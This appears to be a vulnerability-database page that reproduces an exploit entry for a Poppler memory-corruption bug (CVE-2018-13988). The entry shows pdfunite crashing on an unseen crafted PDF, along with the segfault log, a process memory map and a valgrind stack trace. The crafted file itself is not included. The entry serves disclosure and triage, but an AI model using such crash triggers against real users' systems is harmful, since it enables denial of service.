Vulners
Lucene search
Poppler v0.62.0 Memory Corruption Vulnerability
| Reporter | Title | Published | Views | Family All 107 |
|---|---|---|---|---|
 | Amazon Linux 2 : poppler (ALAS-2019-1217) | 31 May 201900:00 | – | nessus |
| Amazon Linux AMI : poppler (ALAS-2018-1110) | 7 Dec 201800:00 | – | nessus |
| CentOS 7 : PackageKit / accountsservice / adwaita-icon-theme / appstream-data / at-spi2-atk / etc (CESA-2018:3140) | 16 Nov 201800:00 | – | nessus |
| EulerOS 2.0 SP3 : poppler (EulerOS-SA-2018-1393) | 10 Dec 201800:00 | – | nessus |
| EulerOS 2.0 SP5 : poppler (EulerOS-SA-2019-1010) | 8 Jan 201900:00 | – | nessus |
| EulerOS 2.0 SP2 : poppler (EulerOS-SA-2019-1054) | 22 Feb 201900:00 | – | nessus |
| Fedora 28 : mingw-poppler (2018-12b934e224) | 3 Jan 201900:00 | – | nessus |
| Fedora 28 : poppler (2018-c8c7d35b83) | 3 Jan 201900:00 | – | nessus |
| Fedora 27 : poppler (2018-e1f03d1f72) | 15 Aug 201800:00 | – | nessus |
| MiracleLinux 7 : [security - medium] GNOME (AXSA:2019-3574:01) | 16 Jan 202600:00 | – | nessus |
10
################
#Title: Poppler v0.62.0 Memory Corruption Vulnerability
#CVE: CVE-2018-13988
#CWE: CWE-119
#Exploit Author: Hosein Askari
#Vendor HomePage: https://poppler.freedesktop.org/
#Version : version 0.62.0 and earlier versions
#Tested on: Ubuntu 18.04 (4.15.0-23-generic)
#Date: July 21 2018
#Category: Application
#Author Mail : [email protected]
#Description: Poppler through 0.62 contains a memory corruption vulnerability due to an incorrect memory access that is not mapped in its memory space(improper handling of objects in memory), as #demonstrated by pdfunite. This can result in memory corruption and denial of service. This may be exploitable when a victim opens a specially crafted PDF file.
#Fixed: https://poppler.freedesktop.org/poppler-0.66.0.tar.xz
###############
[email protected]:~$ pdfunite crafted.pdf aa.pdf
Segmentation fault (core dumped)
###############
[14925.737845] pdfunite[5097]: segfault at 564d6cf85714 ip 00007f42ac6fd064 sp 00007ffee66adf28 error 4 in libpoppler.so.73.0.0[7f42ac588000+251000]
###############
[email protected]:~$ sudo cat /proc/14698/maps
[sudo] password for constantine:
555555554000-55555555a000 r-xp 00000000 08:01 1444544 /usr/bin/pdfunite
555555759000-55555575a000 r--p 00005000 08:01 1444544 /usr/bin/pdfunite
55555575a000-55555575b000 rw-p 00006000 08:01 1444544 /usr/bin/pdfunite
55555575b000-5555557bf000 rw-p 00000000 00:00 0 [heap]
7ffff4117000-7ffff4122000 r-xp 00000000 08:01 1450444 /usr/lib/x86_64-linux-gnu/libjbig.so.0
7ffff4122000-7ffff4321000 ---p 0000b000 08:01 1450444 /usr/lib/x86_64-linux-gnu/libjbig.so.0
7ffff4321000-7ffff4322000 r--p 0000a000 08:01 1450444 /usr/lib/x86_64-linux-gnu/libjbig.so.0
7ffff4322000-7ffff4325000 rw-p 0000b000 08:01 1450444 /usr/lib/x86_64-linux-gnu/libjbig.so.0
7ffff4325000-7ffff4349000 r-xp 00000000 08:01 3936978 /lib/x86_64-linux-gnu/liblzma.so.5.2.2
7ffff4349000-7ffff4549000 ---p 00024000 08:01 3936978 /lib/x86_64-linux-gnu/liblzma.so.5.2.2
7ffff4549000-7ffff454a000 r--p 00024000 08:01 3936978 /lib/x86_64-linux-gnu/liblzma.so.5.2.2
7ffff454a000-7ffff454b000 rw-p 00025000 08:01 3936978 /lib/x86_64-linux-gnu/liblzma.so.5.2.2
7ffff454b000-7ffff4552000 r-xp 00000000 08:01 3937059 /lib/x86_64-linux-gnu/librt-2.27.so
7ffff4552000-7ffff4751000 ---p 00007000 08:01 3937059 /lib/x86_64-linux-gnu/librt-2.27.so
7ffff4751000-7ffff4752000 r--p 00006000 08:01 3937059 /lib/x86_64-linux-gnu/librt-2.27.so
7ffff4752000-7ffff4753000 rw-p 00007000 08:01 3937059 /lib/x86_64-linux-gnu/librt-2.27.so
7ffff4753000-7ffff4756000 r-xp 00000000 08:01 3936941 /lib/x86_64-linux-gnu/libdl-2.27.so
7ffff4756000-7ffff4955000 ---p 00003000 08:01 3936941 /lib/x86_64-linux-gnu/libdl-2.27.so
7ffff4955000-7ffff4956000 r--p 00002000 08:01 3936941 /lib/x86_64-linux-gnu/libdl-2.27.so
7ffff4956000-7ffff4957000 rw-p 00003000 08:01 3936941 /lib/x86_64-linux-gnu/libdl-2.27.so
7ffff4957000-7ffff495a000 r-xp 00000000 08:01 1450643 /usr/lib/x86_64-linux-gnu/libplds4.so
7ffff495a000-7ffff4b59000 ---p 00003000 08:01 1450643 /usr/lib/x86_64-linux-gnu/libplds4.so
7ffff4b59000-7ffff4b5a000 r--p 00002000 08:01 1450643 /usr/lib/x86_64-linux-gnu/libplds4.so
7ffff4b5a000-7ffff4b5b000 rw-p 00003000 08:01 1450643 /usr/lib/x86_64-linux-gnu/libplds4.so
7ffff4b5b000-7ffff4b5f000 r-xp 00000000 08:01 1450642 /usr/lib/x86_64-linux-gnu/libplc4.so
7ffff4b5f000-7ffff4d5e000 ---p 00004000 08:01 1450642 /usr/lib/x86_64-linux-gnu/libplc4.so
7ffff4d5e000-7ffff4d5f000 r--p 00003000 08:01 1450642 /usr/lib/x86_64-linux-gnu/libplc4.so
7ffff4d5f000-7ffff4d60000 rw-p 00004000 08:01 1450642 /usr/lib/x86_64-linux-gnu/libplc4.so
7ffff4d60000-7ffff4d88000 r-xp 00000000 08:01 1450576 /usr/lib/x86_64-linux-gnu/libnssutil3.so
7ffff4d88000-7ffff4f87000 ---p 00028000 08:01 1450576 /usr/lib/x86_64-linux-gnu/libnssutil3.so
7ffff4f87000-7ffff4f8e000 r--p 00027000 08:01 1450576 /usr/lib/x86_64-linux-gnu/libnssutil3.so
7ffff4f8e000-7ffff4f8f000 rw-p 0002e000 08:01 1450576 /usr/lib/x86_64-linux-gnu/libnssutil3.so
7ffff4f8f000-7ffff4fbe000 r-xp 00000000 08:01 3936948 /lib/x86_64-linux-gnu/libexpat.so.1.6.7
7ffff4fbe000-7ffff51be000 ---p 0002f000 08:01 3936948 /lib/x86_64-linux-gnu/libexpat.so.1.6.7
7ffff51be000-7ffff51c0000 r--p 0002f000 08:01 3936948 /lib/x86_64-linux-gnu/libexpat.so.1.6.7
7ffff51c0000-7ffff51c1000 rw-p 00031000 08:01 3936948 /lib/x86_64-linux-gnu/libexpat.so.1.6.7
7ffff51c1000-7ffff51d8000 r-xp 00000000 08:01 3936955 /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff51d8000-7ffff53d7000 ---p 00017000 08:01 3936955 /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff53d7000-7ffff53d8000 r--p 00016000 08:01 3936955 /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff53d8000-7ffff53d9000 rw-p 00017000 08:01 3936955 /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff53d9000-7ffff53f3000 r-xp 00000000 08:01 3937051 /lib/x86_64-linux-gnu/libpthread-2.27.so
7ffff53f3000-7ffff55f2000 ---p 0001a000 08:01 3937051 /lib/x86_64-linux-gnu/libpthread-2.27.so
7ffff55f2000-7ffff55f3000 r--p 00019000 08:01 3937051 /lib/x86_64-linux-gnu/libpthread-2.27.so
7ffff55f3000-7ffff55f4000 rw-p 0001a000 08:01 3937051 /lib/x86_64-linux-gnu/libpthread-2.27.so
7ffff55f4000-7ffff55f8000 rw-p 00000000 00:00 0
7ffff55f8000-7ffff5795000 r-xp 00000000 08:01 3936981 /lib/x86_64-linux-gnu/libm-2.27.so
7ffff5795000-7ffff5994000 ---p 0019d000 08:01 3936981 /lib/x86_64-linux-gnu/libm-2.27.so
7ffff5994000-7ffff5995000 r--p 0019c000 08:01 3936981 /lib/x86_64-linux-gnu/libm-2.27.so
7ffff5995000-7ffff5996000 rw-p 0019d000 08:01 3936981 /lib/x86_64-linux-gnu/libm-2.27.so
7ffff5996000-7ffff5a09000 r-xp 00000000 08:01 1450835 /usr/lib/x86_64-linux-gnu/libtiff.so.5.3.0
7ffff5a09000-7ffff5c08000 ---p 00073000 08:01 1450835 /usr/lib/x86_64-linux-gnu/libtiff.so.5.3.0
7ffff5c08000-7ffff5c0c000 r--p 00072000 08:01 1450835 /usr/lib/x86_64-linux-gnu/libtiff.so.5.3.0
7ffff5c0c000-7ffff5c0d000 rw-p 00076000 08:01 1450835 /usr/lib/x86_64-linux-gnu/libtiff.so.5.3.0
7ffff5c0d000-7ffff5c3e000 r-xp 00000000 08:01 1450647 /usr/lib/x86_64-linux-gnu/libpng16.so.16.34.0
7ffff5c3e000-7ffff5e3d000 ---p 00031000 08:01 1450647 /usr/lib/x86_64-linux-gnu/libpng16.so.16.34.0
7ffff5e3d000-7ffff5e3e000 r--p 00030000 08:01 1450647 /usr/lib/x86_64-linux-gnu/libpng16.so.16.34.0
7ffff5e3e000-7ffff5e3f000 rw-p 00031000 08:01 1450647 /usr/lib/x86_64-linux-gnu/libpng16.so.16.34.0
7ffff5e3f000-7ffff5e91000 r-xp 00000000 08:01 1450468 /usr/lib/x86_64-linux-gnu/liblcms2.so.2.0.8
7ffff5e91000-7ffff6091000 ---p 00052000 08:01 1450468 /usr/lib/x86_64-linux-gnu/liblcms2.so.2.0.8
7ffff6091000-7ffff6093000 r--p 00052000 08:01 1450468 /usr/lib/x86_64-linux-gnu/liblcms2.so.2.0.8
7ffff6093000-7ffff6096000 rw-p 00054000 08:01 1450468 /usr/lib/x86_64-linux-gnu/liblcms2.so.2.0.8
7ffff6096000-7ffff6097000 rw-p 00000000 00:00 0
7ffff6097000-7ffff60d0000 r-xp 00000000 08:01 1450574 /usr/lib/x86_64-linux-gnu/libnspr4.so
7ffff60d0000-7ffff62cf000 ---p 00039000 08:01 1450574 /usr/lib/x86_64-linux-gnu/libnspr4.so
7ffff62cf000-7ffff62d0000 r--p 00038000 08:01 1450574 /usr/lib/x86_64-linux-gnu/libnspr4.so
7ffff62d0000-7ffff62d1000 rw-p 00039000 08:01 1450574 /usr/lib/x86_64-linux-gnu/libnspr4.so
7ffff62d1000-7ffff62d4000 rw-p 00000000 00:00 0
7ffff62d4000-7ffff62fc000 r-xp 00000000 08:01 1450769 /usr/lib/x86_64-linux-gnu/libsmime3.so
7ffff62fc000-7ffff64fc000 ---p 00028000 08:01 1450769 /usr/lib/x86_64-linux-gnu/libsmime3.so
7ffff64fc000-7ffff64ff000 r--p 00028000 08:01 1450769 /usr/lib/x86_64-linux-gnu/libsmime3.so
7ffff64ff000-7ffff6500000 rw-p 0002b000 08:01 1450769 /usr/lib/x86_64-linux-gnu/libsmime3.so
7ffff6500000-7ffff663c000 r-xp 00000000 08:01 1450575 /usr/lib/x86_64-linux-gnu/libnss3.so
7ffff663c000-7ffff683c000 ---p 0013c000 08:01 1450575 /usr/lib/x86_64-linux-gnu/libnss3.so
7ffff683c000-7ffff6841000 r--p 0013c000 08:01 1450575 /usr/lib/x86_64-linux-gnu/libnss3.so
7ffff6841000-7ffff6843000 rw-p 00141000 08:01 1450575 /usr/lib/x86_64-linux-gnu/libnss3.so
7ffff6843000-7ffff6844000 rw-p 00000000 00:00 0
7ffff6844000-7ffff6860000 r-xp 00000000 08:01 3937090 /lib/x86_64-linux-gnu/libz.so.1.2.11
7ffff6860000-7ffff6a5f000 ---p 0001c000 08:01 3937090 /lib/x86_64-linux-gnu/libz.so.1.2.11
7ffff6a5f000-7ffff6a60000 r--p 0001b000 08:01 3937090 /lib/x86_64-linux-gnu/libz.so.1.2.11
7ffff6a60000-7ffff6a61000 rw-p 0001c000 08:01 3937090 /lib/x86_64-linux-gnu/libz.so.1.2.11
7ffff6a61000-7ffff6ac8000 r-xp 00000000 08:01 1450448 /usr/lib/x86_64-linux-gnu/libjpeg.so.8.1.2
7ffff6ac8000-7ffff6cc7000 ---p 00067000 08:01 1450448 /usr/lib/x86_64-linux-gnu/libjpeg.so.8.1.2
7ffff6cc7000-7ffff6cc8000 r--p 00066000 08:01 1450448 /usr/lib/x86_64-linux-gnu/libjpeg.so.8.1.2
7ffff6cc8000-7ffff6cc9000 rw-p 00067000 08:01 1450448 /usr/lib/x86_64-linux-gnu/libjpeg.so.8.1.2
7ffff6cc9000-7ffff6d07000 r-xp 00000000 08:01 1450139 /usr/lib/x86_64-linux-gnu/libfontconfig.so.1.10.1
7ffff6d07000-7ffff6f07000 ---p 0003e000 08:01 1450139 /usr/lib/x86_64-linux-gnu/libfontconfig.so.1.10.1
7ffff6f07000-7ffff6f09000 r--p 0003e000 08:01 1450139 /usr/lib/x86_64-linux-gnu/libfontconfig.so.1.10.1
7ffff6f09000-7ffff6f0e000 rw-p 00040000 08:01 1450139 /usr/lib/x86_64-linux-gnu/libfontconfig.so.1.10.1
7ffff6f0e000-7ffff6fbb000 r-xp 00000000 08:01 1450157 /usr/lib/x86_64-linux-gnu/libfreetype.so.6.15.0
7ffff6fbb000-7ffff71ba000 ---p 000ad000 08:01 1450157 /usr/lib/x86_64-linux-gnu/libfreetype.so.6.15.0
7ffff71ba000-7ffff71c1000 r--p 000ac000 08:01 1450157 /usr/lib/x86_64-linux-gnu/libfreetype.so.6.15.0
7ffff71c1000-7ffff71c2000 rw-p 000b3000 08:01 1450157 /usr/lib/x86_64-linux-gnu/libfreetype.so.6.15.0
7ffff71c2000-7ffff73a9000 r-xp 00000000 08:01 3936918 /lib/x86_64-linux-gnu/libc-2.27.so
7ffff73a9000-7ffff75a9000 ---p 001e7000 08:01 3936918 /lib/x86_64-linux-gnu/libc-2.27.so
7ffff75a9000-7ffff75ad000 r--p 001e7000 08:01 3936918 /lib/x86_64-linux-gnu/libc-2.27.so
7ffff75ad000-7ffff75af000 rw-p 001eb000 08:01 3936918 /lib/x86_64-linux-gnu/libc-2.27.so
7ffff75af000-7ffff75b3000 rw-p 00000000 00:00 0
7ffff75b3000-7ffff7731000 r-xp 00000000 08:01 1450804 /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.25
7ffff7731000-7ffff7931000 ---p 0017e000 08:01 1450804 /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.25
7ffff7931000-7ffff793b000 r--p 0017e000 08:01 1450804 /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.25
7ffff793b000-7ffff793d000 rw-p 00188000 08:01 1450804 /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.25
7ffff793d000-7ffff7941000 rw-p 00000000 00:00 0
7ffff7941000-7ffff7b92000 r-xp 00000000 08:01 1442675 /usr/lib/x86_64-linux-gnu/libpoppler.so.73.0.0
7ffff7b92000-7ffff7d91000 ---p 00251000 08:01 1442675 /usr/lib/x86_64-linux-gnu/libpoppler.so.73.0.0
7ffff7d91000-7ffff7daf000 r--p 00250000 08:01 1442675 /usr/lib/x86_64-linux-gnu/libpoppler.so.73.0.0
7ffff7daf000-7ffff7dd5000 rw-p 0026e000 08:01 1442675 /usr/lib/x86_64-linux-gnu/libpoppler.so.73.0.0
7ffff7dd5000-7ffff7dfc000 r-xp 00000000 08:01 3936890 /lib/x86_64-linux-gnu/ld-2.27.so
7ffff7f6e000-7ffff7faf000 rw-p 00000000 00:00 0
7ffff7fd0000-7ffff7fdf000 rw-p 00000000 00:00 0
7ffff7ff7000-7ffff7ffa000 r--p 00000000 00:00 0 [vvar]
7ffff7ffa000-7ffff7ffc000 r-xp 00000000 00:00 0 [vdso]
7ffff7ffc000-7ffff7ffd000 r--p 00027000 08:01 3936890 /lib/x86_64-linux-gnu/ld-2.27.so
7ffff7ffd000-7ffff7ffe000 rw-p 00028000 08:01 3936890 /lib/x86_64-linux-gnu/ld-2.27.so
7ffff7ffe000-7ffff7fff000 rw-p 00000000 00:00 0
7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0 [stack]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
##################
==14154== Process terminating with default action of signal 11 (SIGSEGV)
==14154== Bad permissions for mapped region at address 0x8A8F4F4
==14154== at 0x4FB1064: XRef::getEntry(int, bool) (in /usr/lib/x86_64-linux-gnu/libpoppler.so.73.0.0)
==14154== by 0x4F9AA7D: PDFDoc::markObject(Object*, XRef*, XRef*, unsigned int, int, int, std::set<Dict*, std::less<Dict*>, std::allocator<Dict*> >*) (in /usr/lib/x86_64-linux-gnu/libpoppler.so.73.0.0)
==14154== by 0x4F9A8EB: PDFDoc::markDictionnary(Dict*, XRef*, XRef*, unsigned int, int, int, std::set<Dict*, std::less<Dict*>, std::allocator<Dict*> >*) (in /usr/lib/x86_64-linux-gnu/libpoppler.so.73.0.0)
==14154== by 0x4F9AD07: PDFDoc::markObject(Object*, XRef*, XRef*, unsigned int, int, int, std::set<Dict*, std::less<Dict*>, std::allocator<Dict*> >*) (in /usr/lib/x86_64-linux-gnu/libpoppler.so.73.0.0)
==14154== by 0x4F9ACAE: PDFDoc::markObject(Object*, XRef*, XRef*, unsigned int, int, int, std::set<Dict*, std::less<Dict*>, std::allocator<Dict*> >*) (in /usr/lib/x86_64-linux-gnu/libpoppler.so.73.0.0)
==14154== by 0x4F9A8EB: PDFDoc::markDictionnary(Dict*, XRef*, XRef*, unsigned int, int, int, std::set<Dict*, std::less<Dict*>, std::allocator<Dict*> >*) (in /usr/lib/x86_64-linux-gnu/libpoppler.so.73.0.0)
==14154== by 0x4F9AD07: PDFDoc::markObject(Object*, XRef*, XRef*, unsigned int, int, int, std::set<Dict*, std::less<Dict*>, std::allocator<Dict*> >*) (in /usr/lib/x86_64-linux-gnu/libpoppler.so.73.0.0)
==14154== by 0x4F9ACAE: PDFDoc::markObject(Object*, XRef*, XRef*, unsigned int, int, int, std::set<Dict*, std::less<Dict*>, std::allocator<Dict*> >*) (in /usr/lib/x86_64-linux-gnu/libpoppler.so.73.0.0)
==14154== by 0x4F9A8EB: PDFDoc::markDictionnary(Dict*, XRef*, XRef*, unsigned int, int, int, std::set<Dict*, std::less<Dict*>, std::allocator<Dict*> >*) (in /usr/lib/x86_64-linux-gnu/libpoppler.so.73.0.0)
==14154== by 0x4F9AD07: PDFDoc::markObject(Object*, XRef*, XRef*, unsigned int, int, int, std::set<Dict*, std::less<Dict*>, std::allocator<Dict*> >*) (in /usr/lib/x86_64-linux-gnu/libpoppler.so.73.0.0)
==14154== by 0x4F9AEDC: PDFDoc::markPageObjects(Dict*, XRef*, XRef*, unsigned int, int, int, std::set<Dict*, std::less<Dict*>, std::allocator<Dict*> >*) (in /usr/lib/x86_64-linux-gnu/libpoppler.so.73.0.0)
==14154== by 0x10A85B: main (in /usr/bin/pdfunite)
References:
https://cgit.freedesktop.org/poppler/poppler/commit/?id=004e3c10df0abda214f0c293f9e269fdd979c5ee
# 0day.today [2018-07-24] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Jul 2018 00:00Current
0.2Low risk
Vulners AI Score0.2
EPSS0.00696